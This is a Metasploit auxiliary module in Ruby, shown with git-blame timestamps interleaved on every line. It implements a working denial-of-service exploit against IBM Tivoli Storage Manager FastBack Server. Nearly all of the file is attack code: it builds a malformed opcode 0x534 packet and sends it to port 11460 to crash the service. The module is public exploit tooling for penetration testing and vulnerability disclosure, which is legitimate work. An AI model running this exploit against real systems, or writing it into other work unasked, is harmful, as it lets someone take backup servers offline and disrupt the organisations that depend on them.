2016-02-08 20:36:14 +00:00
|
|
|
##
|
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Auxiliary
|
2016-02-08 20:36:14 +00:00
|
|
|
include Msf::Exploit::Remote::Tcp
|
2016-02-10 16:59:11 +00:00
|
|
|
include Msf::Auxiliary::Dos
|
2016-02-08 20:36:14 +00:00
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
2016-02-17 20:33:35 +00:00
|
|
|
'Name' => "IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service",
|
2016-02-08 20:36:14 +00:00
|
|
|
'Description' => %q{
|
2016-02-12 04:04:05 +00:00
|
|
|
This module exploits a denial of service condition present in IBM Tivoli Storage Manager
|
|
|
|
FastBack Server when dealing with packets triggering the opcode 0x534 handler.
|
|
|
|
},
|
2016-02-08 20:36:14 +00:00
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' =>
|
|
|
|
[
|
2016-02-09 17:44:01 +00:00
|
|
|
'Gianni Gnesa', # Public disclosure/Proof of Concept
|
2016-02-08 20:36:14 +00:00
|
|
|
'William Webb <william_webb[at]rapid7.com>', # Metasploit
|
|
|
|
],
|
|
|
|
'References' =>
|
|
|
|
[
|
2016-02-12 04:04:05 +00:00
|
|
|
['EDB', '38979'],
|
2016-07-15 17:00:31 +00:00
|
|
|
['OSVDB', '132307']
|
2016-02-08 20:36:14 +00:00
|
|
|
],
|
2016-02-10 17:40:21 +00:00
|
|
|
'DisclosureDate' => "Dec 15 2015",
|
2016-02-12 04:04:05 +00:00
|
|
|
))
|
2016-02-08 20:36:14 +00:00
|
|
|
|
2016-02-12 04:04:05 +00:00
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(11460)
|
2017-05-03 20:42:21 +00:00
|
|
|
])
|
2016-02-08 20:36:14 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def tv_pkt(opcode, p1="", p2="", p3="")
|
|
|
|
buf = Rex::Text.rand_text_alpha(0x0C)
|
|
|
|
buf += [opcode].pack("V")
|
|
|
|
buf += [0x00].pack("V")
|
|
|
|
buf += [p1.length].pack("V")
|
|
|
|
buf += [p1.length].pack("V")
|
|
|
|
buf += [p2.length].pack("V")
|
|
|
|
buf += [p1.length + p2.length].pack("V")
|
|
|
|
buf += [p3.length].pack("V")
|
|
|
|
|
|
|
|
buf += Rex::Text.rand_text_alpha(0x08)
|
|
|
|
|
|
|
|
buf += p1
|
|
|
|
buf += p2
|
|
|
|
buf += p3
|
|
|
|
|
|
|
|
pkt = [buf.length].pack("N")
|
|
|
|
pkt << buf
|
|
|
|
|
|
|
|
return pkt
|
|
|
|
end
|
|
|
|
|
2016-02-10 16:59:11 +00:00
|
|
|
def run
|
2016-02-08 20:36:14 +00:00
|
|
|
target_opcode = 0x534
|
|
|
|
connect
|
2016-02-12 04:04:05 +00:00
|
|
|
print_status("Connected to: #{rhost} port: #{rport}")
|
2016-02-08 20:36:14 +00:00
|
|
|
print_status("Sending malicious packet")
|
|
|
|
|
|
|
|
p = tv_pkt(target_opcode,
|
2016-02-18 21:14:35 +00:00
|
|
|
"File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % [Rex::Text.rand_text_alpha(0x200),0,0,0,0],
|
|
|
|
Rex::Text.rand_text_alpha(0x60),
|
|
|
|
Rex::Text.rand_text_alpha(0x60)
|
2016-02-08 20:36:14 +00:00
|
|
|
)
|
|
|
|
|
|
|
|
sock.put(p)
|
|
|
|
print_status("Packet sent!")
|
2016-02-09 17:44:01 +00:00
|
|
|
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => ex
|
|
|
|
print_status("Exploit failed: #{ex.class} #{ex.message}")
|
|
|
|
elog("#{ex.class} #{ex.message}\n#{ex.backtrace * "\n"}")
|
|
|
|
ensure
|
|
|
|
disconnect
|
2016-02-08 20:36:14 +00:00
|
|
|
end
|
|
|
|
end
|